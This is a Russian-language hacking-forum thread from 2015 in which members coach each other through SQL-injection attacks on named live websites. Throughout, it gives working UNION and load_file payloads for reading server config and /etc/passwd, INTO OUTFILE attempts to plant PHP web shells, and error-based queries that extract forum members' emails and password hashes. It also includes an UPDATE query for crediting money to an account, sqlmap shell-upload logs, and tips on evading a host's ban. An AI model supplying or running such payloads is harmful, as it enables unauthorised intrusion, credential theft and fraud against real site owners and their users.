он пустой скачивается - то есть с ошибкой про размер

при этом права на чтение есть.

а через браузер %20union%20select%201,load_file(%27/etc/apache2/httpd.conf%27),3,4--

открывает - но не видно там пути к папке сайта (

и правильно ли я понял, что люди обладающие знаниями, могли бы залить бекдор + шелл только из этой строки ? без sqlmap и прочего ? - это так для себя что бы понимать уровень

а так я хотел бы для начала с простых примеров - нет я назодил ресурсы где было все просто, но там было просто по методичке грубо говоря, здесь все получил а путь не могу получить (

помогите плс

OxoTnik
16.10.2015, 19:35
aldemko said:
↑ (https://antichat.live/posts/3903365/)
спасибо
извини что беспокою
перепробовал все команды которые в том списке - точнее пути
прописывал
полный путь мне так и не вывело
root я уже получил через sqlmap и папки имеющие права записи тоже нашел.
осталось путь указать в sqlmap куда залиться, а пути у меня нет
пожалуйста подскажи не конкретный путь а что именно может в моем примере вывести абсолютный путь
спасибо
PS Там ось
Gentoo

просто через sqlmap

я не могу скачать файл

/etc/apache2/httpd.conf

он пустой скачивается - то есть с ошибкой про размер

при этом права на чтение есть.

а через браузер %20union%20select%201,load_file(%27/etc/apache2/httpd.conf%27),3,4--

открывает - но не видно там пути к папке сайта (

и правильно ли я понял, что люди обладающие знаниями, могли бы залить бекдор + шелл только из этой строки ? без sqlmap и прочего ? - это так для себя что бы понимать уровень

а так я хотел бы для начала с простых примеров - нет я назодил ресурсы где было все просто, но там было просто по методичке грубо говоря, здесь все получил а путь не могу получить (

помогите плс


все верно 1 запрос и там шел.

BabaDook
16.10.2015, 19:36
OxoTnik said:
↑ (https://antichat.live/posts/3903404/)
все верно 1 запрос и там шел.


а не всегда, если нету папок на запись то никак.

после root@localhost я бы пытался бы залить мини шел

qaz
16.10.2015, 19:52
aldemko said:
↑ (https://antichat.live/posts/3903365/)
спасибо
извини что беспокою
перепробовал все команды которые в том списке - точнее пути
прописывал
полный путь мне так и не вывело
root я уже получил через sqlmap и папки имеющие права записи тоже нашел.
осталось путь указать в sqlmap куда залиться, а пути у меня нет
пожалуйста подскажи не конкретный путь а что именно может в моем примере вывести абсолютный путь
спасибо


я бы в первую очередь поискал phpmyadmin и phpinfo .....

aldemko
16.10.2015, 20:02
phpmyadmin есть

root есть

папки для записи есть

нужен абсолютный путь сайта

OxoTnik (https://antichat.live/members/165241/) порекомендовал просмотреть сайт http://wiki.apache.org/httpd/DistrosDefaultLayout

я пробовал подставить все пути для Gentoo списывал

отображает данные, но абсолютного пути я там не нашел

web server operating system: Linux Gentoo

web application technology: Apache, PHP 5.3.29

back-end DBMS: MySQL 5.0.12

OxoTnik подскажи что мне нужно написать в скобках что бы путь появился если не сложно

а не всегда, если нету папок на запись то никак.

после root@localhost я бы пытался бы залить мини шел


BabaDook said:
↑ (https://antichat.live/posts/3903405/)
а не всегда, если нету папок на запись то никак.
после root@localhost я бы пытался бы залить мини шел



так мне бы абсолютный путь знать ((

я никак не могу его вычислить

как я понимаю

(%27//etc/apache2/httpd.conf%27),3,4--

должен вывести путь

но там просто стандартный закоментированный файл (

BabaDook
16.10.2015, 20:21
Я не профи

http://www.direct-line.ru/images/Thumbs.db

http://www.direct-line.ru/images/karta-big.old

может это что-то даст

aldemko
16.10.2015, 20:33
BabaDook said:
↑ (https://antichat.live/posts/3903430/)
Я не профи
http://www.direct-line.ru/images/Thumbs.db
http://www.direct-line.ru/images/karta-big.old
может это что-то даст


ты меня совсем озадачил

скачал файлы эти, не открываются, под Thumbs.db (http://www.direct-line.ru/images/Thumbs.db) скачал

Thumbnail Database Viewer

показывает список картинок

я наверное баран, но я пути не вижу (*

скажи ты там что-то видишь ? не говори как, просто если там есть информация, я буду искать как ее извлечь с таких файлов.

спасибо

BabaDook
16.10.2015, 23:13
http://www.direct-line.ru/phpmyadmin/

http://www.direct-line.ru/old_site/

http://www.direct-line.ru/server-info -403, можно сделать попытку обойти

aldemko
17.10.2015, 09:40
Спасибо но это я уже находил

мне бы разобраться с той ссылкой что ты дал

я пробовал подставлять разные значения подходящие под Gento но я так и не смог отобразить на сайте абсолютный путь ресурса (

Br@!ns
17.10.2015, 11:49
aldemko said:
↑ (https://antichat.live/posts/3903557/)
Спасибо но это я уже находил
мне бы разобраться с той ссылкой что ты дал
я пробовал подставлять разные значения подходящие под Gento но я так и не смог отобразить на сайте абсолютный путь ресурса (


вот вам раскрытие, с соседней сайта. лучше смотрите

http://media-monitor.ru/admin

www.direct-line.ru/news_win.php?id=-2170 (http://www.direct-line.ru/news_win.php?id=-2170) union select 1,load_file('/var/www/localhost/htdocs/media-monitor.ru/www/admin.php'),3,4--

http://www.direct-line.ru/news_win....-monitor.ru/www/kernel/cfg/config.php'),3,4-- (http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file%28'/var/www/localhost/htdocs/media-monitor.ru/www/kernel/cfg/config.php'%29,3,4--)

или под ваш ресурс поулчается - http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/direct-line.ru/www/index.php'),3,4-- (http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file%28%27/var/www/localhost/htdocs/media-monitor.ru/www/kernel/cfg/config.php%27%29,3,4--)

aldemko
17.10.2015, 16:45
С предыдущей ситуацией разобрался - доступ к php админу получен - пароль к сожалению оказался простым. дальше интерес к тому ресурсу исчерпан

Я начал искать новые ресурсы для обучения и практики

и так ресурс:

http://www.aza.com.ua

phpinfdo http://www.aza.com.ua/info.php

страница с раскрытием пути http://www.aza.com.ua/email/mail_form_short.html

немного о сервере

web server operating system: Windows

web application technology: Apache 2.2.21, PHP 5.2.17

back-end DBMS: MySQL 5.0

current user: 'root@localhost'

current database: 'test'

current user is DBA: True

uniscan по ключу --qwe

показывает (если я правильно понял) папки с правами на запись

| Directory check:

| [+] CODE: 200 URL: http://www.aza.com.ua/banner/

| [+] CODE: 200 URL: http://www.aza.com.ua/cart/

| [+] CODE: 200 URL: http://www.aza.com.ua/conf/

| [+] CODE: 200 URL: http://www.aza.com.ua/doc/

| [+] CODE: 200 URL: http://www.aza.com.ua/email/

| [+] CODE: 200 URL: http://www.aza.com.ua/edit/

| [+] CODE: 200 URL: http://www.aza.com.ua/images/

| [+] CODE: 200 URL: http://www.aza.com.ua/img/

| [+] CODE: 200 URL: http://www.aza.com.ua/japan/

| [+] CODE: 200 URL: http://www.aza.com.ua/news/

| [+] CODE: 200 URL: http://www.aza.com.ua/orders/

| [+] CODE: 200 URL: http://www.aza.com.ua/pma/

| [+] CODE: 200 URL: http://www.aza.com.ua/quest/

| [+] CODE: 200 URL: http://www.aza.com.ua/user/

затем используя sqlmap-u сайт --os-cmd –v l

выбираю 4 (php)

затем на запрос куда лить - указываю адрес (судя с http://www.aza.com.ua/email/mail_form_short.html) D:\Sites\home\aza.com.ua\htdocs\ и подставляю по очередно папки из данных Uniscana - но увы ответ приходит один и тот же:


Code:
please provide a comma separate list of absolute directory paths: D:\Sites\home\aza.com.ua\htdocs\email\
[22:27:14] [WARNING] unable to automatically parse any web server path
[22:27:14] [INFO] trying to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/' via LIMIT 'LINES TERMINATED BY' method
[22:27:15] [INFO] heuristics detected web page charset 'MacCyrillic'
[22:27:17] [WARNING] unable to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/'
[22:27:17] [INFO] trying to upload the file stager on '/servis/' via LIMIT 'LINES TERMINATED BY' method
[22:27:19] [WARNING] unable to upload the file stager on '/servis/'
[22:27:19] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 8 times
[22:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.aza.com.ua'

подскажите что я не так делаю ?

Проблема в пути который указываю в sqlmap

или в том что статус 200 в uniscan Не имеет в виду что права на запись есть

или еще что то ?

спасибо

RedFern.89
17.10.2015, 17:06
Вопрос по поводу error based. Возможно ли вытаскивать больше 32 символов? И второй, возможно ли как-то автоматизировать а не вытаскивать по одному пользователю руками через limit?

AlexG
17.10.2015, 17:15
RedFern.89 said:
↑ (https://antichat.live/posts/3903684/)
Вопрос по поводу error based. Возможно ли вытаскивать больше 32 символов? И второй, возможно ли как-то автоматизировать а не вытаскивать по одному пользователю руками через limit?


Первый вопрос - https://rdot.org/forum/showthread.php?t=60

faza02
17.10.2015, 17:18
RedFern.89 said:
↑ (https://antichat.live/posts/3903684/)
Вопрос по поводу error based. Возможно ли вытаскивать больше 32 символов? И второй, возможно ли как-то автоматизировать а не вытаскивать по одному пользователю руками через limit?


использовать другие векторы, самый максимальный вывод - через big into, 450+ символов. можно найти на рдоте остальные.

автоматизировать с помощью любого яп, удобнее и проще выбрать php или python.

faza02
17.10.2015, 17:20
AlexG said:
↑ (https://antichat.live/posts/3903686/)
Первый вопрос -
https://rdot.org/forum/showthread.php?t=60


https://rdot.org/forum/showthread.php?t=3257

RedFern.89
17.10.2015, 17:29
Code:
and+extractvalue(0x3a,concat(0x3a,(select concat(email,members_pass_hash,members_pass_salt) from ipb_members limit 2,1)))and'-1/

Помогите преобразовать под другой вектор, пожалуйста

AlexG
17.10.2015, 18:27
RedFern.89 said:
↑ (https://antichat.live/posts/3903693/)

Code:
and+extractvalue(0x3a,concat(0x3a,(select concat(email,members_pass_hash,members_pass_salt) from ipb_members limit 2,1)))and'-1/

Помогите преобразовать под другой вектор, пожалуйста


Предположу что выглядеть может как-то так:


Code:
+|(select!x-~0.FROM(select+(select concat(email,members_pass_hash,members_pass_salt) from ipb_members limit 1,1)x)f)and'-1/

Проверить по понятным причинам не могу, да и такой метод в реальности еще ни разу не эксплуатировал.

Roger96
17.10.2015, 20:06
Ребята как слить!


Code:
Request
POST /pokladna.php3?zmen_pocet=1 HTTP/1.1
Content-Length: 171
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.site/index.php3
Cookie: zakaznik=54232320171015; mena=kc; PHPSESSID=e65098cea0bfe728376afb73aecdfa9a; poslednipokladna=http%3A%2F%2Fwww.xzone.cz%2Fnovin ky.php3; PAPCookie_Imp_90792bb8=pap; A=0e64cc89bb5bb899f9c35e353152dda1; PAPCookie_Imp_=pap; M=d8a3af2bf6e34bc085d8077ee2f169e8; PAPCookie_Imp_11110001=pap; PAPCookie_Imp_11110002=pap; T_pap_sid=c5435b85e7695cc26819e282204671aa; PAPVisitorId=855a30dc32b3e6caeff8ed45d7f43e88; pinst=0ea803e135aa19014ec315b34f3f2567; I_pap_sid=7323f7a4ad1d3c86292e465bf78514b5; I=70f4c5f3bd4e0f3aeb9ca8d9847fefae; __utmt=1; __utma=105760714.564703462.1445165254.1445165254.1 445165254.1; __utmb=105760714.11.10.1445165254; __utmc=105760714; __utmz=105760714.1445165254.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utm cct=/javascript:domxssExecutionSink(0,"'\">()refdxss"); __utmli=info_title
Host: www.site
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

druh%5b%5d=xbox360&idhry%5b%5d=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b( select(0)from(select(sleep(0)))v)%2b%22*/&pocet%5b%5d=1


http://i.shotnes.com/a/17/5h144kmo.ijb_562271d10c4de.png

немогу уже больше( это как пример !! уязвимостей у меня есть очень много но ничего не получается !! если кто подробнее сможет помочь отпишите плз в icq 660668871 буду благодарен ! или хотябы тут как вот ету слить .

Kirza
17.10.2015, 20:17
ПРивет Всем. Извините за тупой вопрос. НО

Имеем

id

pid

email

psw

name

family

phone

icq

who

count_rur

curr_num

top10_login

notshow_top10_login

dataadd administrator

moderator

last_data_auth

last_data_update

hash action

Таблица adtram_users

Нужно прописать запрос на добавление денег. Сюда: count_rur

как ? Плиз -

faza02
17.10.2015, 20:41
update adtram_users set count_rur = * where id=*

Kirza
17.10.2015, 20:51
yarbabin said:
↑ (https://antichat.live/posts/3903757/)
update adtram_users set count_rur = * where id=*


почемут не получилось(

Если прав нет и не получится так понимаю.? и есть ли возможность их получить*

Это тизерка. За помощь дам фтп . тоесть на 2их будет

faza02
17.10.2015, 21:00
уточните все условия

Kirza
17.10.2015, 21:05
yarbabin said:
↑ (https://antichat.live/posts/3903771/)
уточните все условия


+ Не заметил.

!!!!!!!!

BabaDook
18.10.2015, 01:02
Br@!ns said:
↑ (https://antichat.live/posts/3903579/)
вот вам раскрытие, с соседней сайта. лучше смотрите
http://media-monitor.ru/admin
www.direct-line.ru/news_win.php?id=-2170 (http://www.direct-line.ru/news_win.php?id=-2170)
union select 1,load_file('/var/www/localhost/htdocs/media-monitor.ru/www/admin.php'),3,4--
http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/media-monitor.ru/www/kernel/cfg/config.php'),3,4-- (http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file%28'/var/www/localhost/htdocs/media-monitor.ru/www/kernel/cfg/config.php'%29,3,4--)
или под ваш ресурс поулчается -
http://www.direct-line.ru/news_win.php?id=-2170 union select 1,load_file('/var/www/localhost/htdocs/direct-line.ru/www/index.php'),3,4-- (http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file%28%27/var/www/localhost/htdocs/media-monitor.ru/www/kernel/cfg/config.php%27%29,3,4--)


я СОСЕДНИЙ САЙТ ТОЖЕ СМОТРЕЛ.

/var/www/localhost/htdocs/media-monitor.ru/www/

/var/www/localhost/htdocs/media-monitor.ru/www/kernel/ такой путь догадка была ?

RedFern.89
18.10.2015, 07:37
AlexG said:
↑ (https://antichat.live/posts/3903712/)
Проверить по понятным причинам не могу, да и такой метод в реальности еще ни разу не эксплуатировал.


все работает, спасибо. осталось лишь автоматизировать

AlexG
18.10.2015, 08:30
RedFern.89 said:
↑ (https://antichat.live/posts/3903872/)
все работает, спасибо. осталось лишь автоматизировать


Ну раз работает, то это уже хорошо По автоматизации, как выше уже сказал yarbabin (https://antichat.live/members/45288/) - php или другой яп. Я взял бы за основу какой-нибудь HTML-парсер и засунул его в цикл.

kingbeef
18.10.2015, 08:50
aldemko said:
↑ (https://antichat.live/posts/3903673/)
С предыдущей ситуацией разобрался - доступ к php админу получен - пароль к сожалению оказался простым. дальше интерес к тому ресурсу исчерпан
Я начал искать новые ресурсы для обучения и практики
и так ресурс:
http://www.aza.com.ua
phpinfdo
http://www.aza.com.ua/info.php
страница с раскрытием пути
http://www.aza.com.ua/email/mail_form_short.html
немного о сервере
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current database: 'test'
current user is DBA: True
uniscan по ключу --qwe
показывает (если я правильно понял) папки с правами на запись
| Directory check:
| [+] CODE: 200 URL:
http://www.aza.com.ua/banner/
| [+] CODE: 200 URL:
http://www.aza.com.ua/cart/
| [+] CODE: 200 URL:
http://www.aza.com.ua/conf/
| [+] CODE: 200 URL:
http://www.aza.com.ua/doc/
| [+] CODE: 200 URL:
http://www.aza.com.ua/email/
| [+] CODE: 200 URL:
http://www.aza.com.ua/edit/
| [+] CODE: 200 URL:
http://www.aza.com.ua/images/
| [+] CODE: 200 URL:
http://www.aza.com.ua/img/
| [+] CODE: 200 URL:
http://www.aza.com.ua/japan/
| [+] CODE: 200 URL:
http://www.aza.com.ua/news/
| [+] CODE: 200 URL:
http://www.aza.com.ua/orders/
| [+] CODE: 200 URL:
http://www.aza.com.ua/pma/
| [+] CODE: 200 URL:
http://www.aza.com.ua/quest/
| [+] CODE: 200 URL:
http://www.aza.com.ua/user/
затем используя sqlmap-u сайт --os-cmd –v l
выбираю 4 (php)
затем на запрос куда лить - указываю адрес (судя с
http://www.aza.com.ua/email/mail_form_short.html
) D:\Sites\home\aza.com.ua\htdocs\ и подставляю по очередно папки из данных Uniscana - но увы ответ приходит один и тот же:

Code:
please provide a comma separate list of absolute directory paths: D:\Sites\home\aza.com.ua\htdocs\email\
[22:27:14] [WARNING] unable to automatically parse any web server path
[22:27:14] [INFO] trying to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/' via LIMIT 'LINES TERMINATED BY' method
[22:27:15] [INFO] heuristics detected web page charset 'MacCyrillic'
[22:27:17] [WARNING] unable to upload the file stager on '/Sites/home/aza.com.ua/htdocs/email/'
[22:27:17] [INFO] trying to upload the file stager on '/servis/' via LIMIT 'LINES TERMINATED BY' method
[22:27:19] [WARNING] unable to upload the file stager on '/servis/'
[22:27:19] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 8 times
[22:27:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.aza.com.ua'

подскажите что я не так делаю ?
Проблема в пути который указываю в sqlmap
или в том что статус 200 в uniscan Не имеет в виду что права на запись есть
или еще что то ?
спасибо


Шелл туда давно уже залит)

/threads/21336/page-796#post-3820554 (https://antichat.live/threads/21336/page-796/)

aldemko
18.10.2015, 09:14
я понимаю что залит

я хочу тоже залить

и спросил в чем моя ошибка а не в том что есть люди которые уже залили

у меня не получается и я расписал действия свои - просто хочу узнать в чем ошибка у меня

kingbeef
18.10.2015, 11:51
aldemko said:
↑ (https://antichat.live/posts/3903890/)
я понимаю что залит
я хочу тоже залить
и спросил в чем моя ошибка а не в том что есть люди которые уже залили
у меня не получается и я расписал действия свои - просто хочу узнать в чем ошибка у меня


Пробуй заливать руками, а не софтом, ищи папку с правами, например папка с картинками.

Roger96
18.10.2015, 14:09
Здравствуйте,вопрос в следующем, я правильно понимаю,что чтобы залить шелл надо иметь доптуп к админке а соответственно знать логин пасс, дак ведь их можно узнать только через уязвимость а если у меня будет такая уязвимость значит я смогу и слить базу соответственно зачем мне уже заливать шелл дак вот вопрос заключается в следующем: как залить шелл незная логина и пароля админа?

ButilkaSoka
18.10.2015, 14:14
Как обойти фильтр кавычки при заливке шелла через sqli?

Когда есть кавычка в into outfile 'путь', то выводит ошибку \' /путь \'

faza02
18.10.2015, 14:44
ButilkaSoka said:
↑ (https://antichat.live/posts/3903958/)
Как обойти фильтр кавычки при заливке шелла через sqli?
Когда есть кавычка в into outfile 'путь', то выводит ошибку
\'
/путь
\'


прочитайте в большом факе условия для заливки. и способ scipio

R3hab
18.10.2015, 15:02
HTML:
www_europarchive_org/item.php?id=lp-00624_BeG

как можно раскрутить?

kingbeef
18.10.2015, 15:23
ButilkaSoka said:
↑ (https://antichat.live/posts/3903958/)
Как обойти фильтр кавычки при заливке шелла через sqli?
Когда есть кавычка в into outfile 'путь', то выводит ошибку
\'
/путь
\'


Единственный вариант при фильтрации ковычек, работает редко.

/threads/43966/page-2#post-663815 (https://antichat.live/threads/43966/page-2/)

Win32BOT
18.10.2015, 16:18
Как посмотреть файловые привилегии пользователя в MariaDB?

По MySQL все понятно:

http://localhost/sql/test.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where +user='root'--+

Помогите разобраться

faza02
18.10.2015, 16:26
Win32BOT said:
↑ (https://antichat.live/posts/3904003/)
Как посмотреть файловые привилегии пользователя в MariaDB?
По MySQL все понятно:
http://localhost/sql/test.php?id=-1+union+select+1,file_priv,3+from+mysql.user+where +user='root'--+
Помогите разобраться


https://mariadb.com/kb/en/mariadb/mysqluser-table/

И вообще достаточно прочитать какой-нибудь файл через load_file()

AlexG
18.10.2015, 20:23
R3hab said:
↑ (https://antichat.live/posts/3903975/)

HTML:
www_europarchive_org/item.php?id=lp-00624_BeG

как можно раскрутить?


Реально интересный пример.

Видно часть запроса, но чет ничего не получается.


Code:
http://www.europarchive.org/item.php?id=lp-00624_BeG'

Мастера, будьте любезны - просветите что тут и как.

Br@!ns
18.10.2015, 23:13
R3hab said:
↑ (https://antichat.live/posts/3903975/)

HTML:
www_europarchive_org/item.php?id=lp-00624_BeG

как можно раскрутить?


С этой непонятно, но рядом есть другая

http://www.europarchive.org/userCon...oken=421e73828fd4888cd36749ee1ad64a50f46 22c89 (http://www.europarchive.org/userConfirm.php?email=lgfhfg@mail.ru'/**/union/**/select/**/null,null,null,null,null,null+--+&token=421e73828fd4888cd36749ee1ad64a50f4622c89)

Думаю вам сюда /threads/35599/ (https://antichat.live/threads/35599/)

kacergei
19.10.2015, 00:25
ПОдскажите как избежать бана вот этого хостера hostpro.ua

Как выставлять кол-во запросов в таких приложениях как fierce, nikto, unicorn

сразу в бан ухожу((

RedFern.89
19.10.2015, 00:58
AlexG said:
↑ (https://antichat.live/posts/3903882/)
Ну раз работает, то это уже хорошо
По автоматизации, как выше уже сказал
yarbabin (https://antichat.live/members/45288/)
- php или другой яп. Я взял бы за основу какой-нибудь HTML-парсер и засунул его в цикл.


проблема в том, что в браузере по прежнему отображается ошибка, через http editor данные вытаскиваются, как быть?

aldemko
19.10.2015, 10:58
Доброго времени суток

я совсем совсем новичек

и так имеем мануал /threads/43966/ (https://antichat.live/threads/43966/)

затем через гугл ищу


Code:
inurl:news-full.php?id=

нашел ресурс


Code:
http://herorace.ru/news-full.php?id=1

при запросе


Code:
http://herorace.ru/news-full.php?id=1%27
выдает ошибку Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/u0093899/data/www/herorace.ru/news-full.php on line70

следуя по мануалу пишу еще один запрос http://herorace.ru/news-full.php?id=1 --
отображает тоже что и просто с 1 - опять же судя по мануалу все ок

дальше следуя по мануалу нужно найти число столбцов я использовал 1' UNION SELECT 1, 2 --
получалось http://herorace.ru/news-full.php?id=1' UNION SELECT 1, 2 --
пробовал после прописывать цифры, 3 и так далее, ошибка со страницы не пропадала, и я решил попробовать с кол-вом полей
1' GROUP BY 2 -- ошибка
1' GROUP BY 10 -- ошибка
1' GROUP BY 100 --
1' GROUP BY 1 -- ошибка - и тут я понял что я наверное что то не так делаю, так как в любом случае полей не может быть меньше чем 1
я решил попробовать 1' GROUP BY 0 -- и тоже ошибка

подскажите что не так делаю ?

спасиобо

Br@!ns
19.10.2015, 12:18
aldemko said:
↑ (https://antichat.live/posts/3904238/)
подскажите что не так делаю ?


В вашем примере кавычка не нужна, у вас другой тип уязвимости, Integer.

http://herorace.ru/news-full.php?id=1+order+by+1+--+ - TRUE

http://herorace.ru/news-full.php?id=1+order+by+7+--+ - FALSE

http://herorace.ru/news-full.php?id=1+union+select+1,2,3,4,5,6+--+ - TRUE

Далее изменим id=1 на несуществующее значение, что бы убрать текст и вывести нужные нам данные

http://herorace.ru/news-full.php?id=999999991+union+select+1,2,3,4,5,6+--+

профит

http://herorace.ru/news-full.php?id=999999991+union+select+1,2,version(),4 ,user(),6+--+

не останавливайтесь на прочтении статьи, комментарии тоже полезные там есть

AlexG
19.10.2015, 12:36
aldemko said:
↑ (https://antichat.live/posts/3904238/)
подскажите что не так делаю ?
спасиобо




Br@!ns said:
↑ (https://antichat.live/posts/3904272/)
В вашем примере кавычка не нужна, у вас другой тип уязвимости, Integer.
http://herorace.ru/news-full.php?id=1+order+by+1+--+
- TRUE
http://herorace.ru/news-full.php?id=1+order+by+7+--+
- FALSE
http://herorace.ru/news-full.php?id=1+union+select+1,2,3,4,5,6+--+
- TRUE
Далее изменим id=1 на несуществующее значение, что бы убрать текст и вывести нужные нам данные
http://herorace.ru/news-full.php?id=999999991+union+select+1,2,3,4,5,6+--+
профит
http://herorace.ru/news-full.php?id=999999991+union+select+1,2,version(),4 ,user(),6+--+
не останавливайтесь на прочтении статьи, комментарии тоже полезные там есть


Хотел добавить - мануалы это НЕ инструкция к конкретным типам сайтов, это всего лишь общий алгоритм действий, а для понимания каждой конкретной ситуации мануалов надо прочитать много. И при поиске по доркам абсолютно не факт, что вы найдете сайты с аналогичными уязвимостями. Причин для этого много - например этот сайт уже ломали и кодер уже пытался "залатать" дыру.

В песочнице, в конкурсе много сайтов живых и уже "расковырянных" - попробуйте с ними "поиграться".

Ну и мое решение к этому вопросу:


Code:
http://herorace.ru/news-full.php?id=-1 union select 1,2,version(),4,database(),6

aldemko
19.10.2015, 12:51
и еще такой вопрос в продолжение к этому примеру если можно

допустим я дошел до


Code:
+union+select+1,2,3,4,5,6+--+

значения version() и database() методом ручной вставки в каждй столб вместо цифр вставлять или существует закономерность ?

к примеру я изменив запрос на


Code:
с 1,2,version(),4,database(),6 на 1,2,3,4,5,database()+--+ уже не получаю вывод базы на сайте


PS Хотя нет получаю, только выводятся уже в другом месте - нашел в исходном коде

спасибо

PS 2 показывает что

current user is DBA: False

это значит залиться через уязвимость не получиться и искать другие ресурсы ?

PS 3 /threads/426171/page-5#post-3904335 (https://antichat.live/threads/426171/page-5/) мой первый самостоятельный сайт

Еще пожалуйста по синтаксису помогите

в общем столбцы узнал, базу узнал, права на запись есть

файл passwd читается


Code:
0+UNION+SELECT+1,2,3,4,5,6,LOAD_FILE(%27/etc/passwd%27),8,9,10+--+

нашел предположительные папки на запись

пробую различные состявлять запросы на заливку файла пока не выходит


Code:
0+UNION+SELECT+1,2,3,%27%27,5,6%20INTO%20OUTFILE%2 0%27/1.php%27,LOAD_FILE(%27/etc/passwd%27),8,9,10+--+

затем я еще раз просмотрел почтовый ящик где мне мистер Br@!ns, давал рекомендации и практические примеры
получился запрос 0+UNION+SELECT+1,2,%27%27,4,5,6,7,8,9,10++into+out file+%27/home/tesis/docs/123.php%27+--++--+
который кстати как по мне работает - только вот в ответ Can't create/write to file '/home/tesis/docs/123.php' (Errcode: 13) - но это уже говорит (я так думаю) о том что сам запрос верно составлен

Теперь возникает вопрос, как искать доступные для записи папки ?
я искал софтом uniscan - Но он показал что эта папка доступна для записи - точнее статус 200. но записаться я туда не могу почему то

Подскажите как правильно искать папки для записи
спасибо


или все же запрос не правильно построил

Вопрос все еще пока для меня актуален

как найти папки для записи ? я в ручную уже за..... перебирать, там куча папок с под папками и прочее

спасибо

PS так же не понятки с @@basedir - показывает что домашняя папка /usr/ - но путь не раскрывает

а ошибка на сайте указывает что сайт находится по /home/tesis/

кому верить ?

может изза не верно укзааного пути, я и не могу файл записать а uniscan не врал и папки действительно разрешены для записи

ButilkaSoka
19.10.2015, 15:52
RedFern.89 said:
↑ (https://antichat.live/posts/3904177/)
проблема в том, что в браузере по прежнему отображается ошибка, через http editor данные вытаскиваются, как быть?


Использовать Burp Suite, символ %20 заменить на пробел.

RedFern.89
19.10.2015, 19:26
ButilkaSoka said:
↑ (https://antichat.live/posts/3904363/)
Использовать Burp Suite, символ %20 заменить на пробел


а автоматизировать весь процесс через него тоже возможно? то есть перебор limit'a?

Waki
19.10.2015, 19:28
Есть linux 2.6.32-042, шелл исполняется под права apache.

В php.ini пустая строка в disable_functions, но не дает менять права на файлы, пробовал через php и через system.

Возможно ли как нибудь повысить права?

Находил вот такой эксплойт _ttps://www.exploit-db.com/exploits/18411/ (http://www.exploit-db.com/exploits/18411/) , но что-то не догоню как его использовать.

RedFern.89
19.10.2015, 20:13
ButilkaSoka said:
↑ (https://antichat.live/posts/3904363/)
Использовать Burp Suite, символ %20 заменить на пробел.


если его заменить на пробел, то запрос прерывается в burp suite на


Code:
/1'+(select!x-~0.FROM(select+(select

ButilkaSoka
19.10.2015, 21:33
RedFern.89 said:
↑ (https://antichat.live/posts/3904472/)
если его заменить на пробел, то запрос прерывается в burp suite на

Code:
/1'+(select!x-~0.FROM(select+(select





Code:
/news'+(select!x-~0.FROM(select+(select concat() )x)f)='/

RedFern.89
19.10.2015, 22:06
ButilkaSoka said:
↑ (https://antichat.live/posts/3904505/)
/news'+(select!x-~0.FROM(select+(select concat() )x)f)='/


не помогло

RedFern.89
19.10.2015, 23:55
ButilkaSoka said:
↑ (https://antichat.live/posts/3904533/)
/news'and(select!x-~0.FROM(select+(select concat(0x3c62723e,name,0x3c62723e) from ipb_members where member_id='15664')x)f)and'/


http://prntscr.com/8t332x

через браузер. через burp suite запрос прерывается там же

faza02
20.10.2015, 00:00
Code:
/news'and(select!x-~0.FROM(select(select(concat(0x3c62723e,name,0x3c6 2723e))from(ipb_members)where(member_id='15664'))x )f)and'/

RedFern.89
20.10.2015, 00:05
yarbabin said:
↑ (https://antichat.live/posts/3904578/)
/news'and(select!x-~0.FROM(select(select(concat(0x3c62723e,name,0x3c6 2723e))from(ipb_members)where(member_id='15664'))x )f)and'/


спасибо, все работает

faza02
20.10.2015, 10:17
SaNDER said:
↑ (https://antichat.live/posts/3904632/)
_ttp://vulkan.site/.htaccess

Code:
RewriteEngine On

RewriteRule ^go/([p0-9]*)/([a-zA-Z0-9]+)/?$ /go.php?pid=$1&tid=$2 [QSA,L]
RewriteRule ^go/([p0-9]*)/?$ /go.php?pid=$1 [QSA,L]

RewriteRule ^imp/([p0-9]*)/([a-zA-Z0-9]+)/?$ /imp.php?pid=$1&tid=$2 [QSA,L]
RewriteRule ^imp/([p0-9]*)/?$ /imp.php?pid=$1 [QSA,L]

RewriteRule ^events/([A-Za-z]+)/?$ /eventapi/api.php?action=$1 [QSA,L]

RewriteRule ^[A-Za-z0-9]+/(p[0-9]+)/([a-zA-Z0-9]+)/?$ /index.php?pid=$1&tid=$2 [QSA,L]
RewriteRule ^[A-Za-z0-9]+/(p[0-9]+)/?$ /index.php?pid=$1 [QSA,L]

RewriteRule ^(p[0-9]*)/([a-zA-Z0-9]+)/?$ /index.php?pid=$1&tid=$2 [QSA]
RewriteRule ^(p[0-9]*)/?$ /index.php?pid=$1 [QSA]

Можно что-нибудь сделать?


можно узнать, как настроен rewriterule. а что вы хотите?

xivi00
20.10.2015, 21:36
http://www.bogema-hotel.ru/access_admin.php в поле логин sqlini как сформировать запрос для sqlmap немогу разобраться

Br@!ns
20.10.2015, 21:45
xivi00 said:
↑ (https://antichat.live/posts/3904924/)
http://www.bogema-hotel.ru/access_admin.php
в поле логин sqlini как сформировать запрос для sqlmap немогу разобраться


-----------------------------219001973211145\r\n

